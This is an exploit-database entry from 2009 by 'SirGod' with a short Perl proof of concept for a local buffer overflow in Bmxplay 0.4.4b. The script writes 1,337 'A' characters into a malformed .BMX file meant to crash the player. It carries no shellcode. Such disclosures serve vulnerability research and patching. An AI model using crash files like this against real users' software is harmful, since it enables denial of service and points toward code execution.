id: 6855
date: 05/03/2009
title: Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
author: SirGod
cves: 

====================================================
Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
====================================================



#####################################################################################################
#                    Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";




#  0day.today [2023-03-26]  #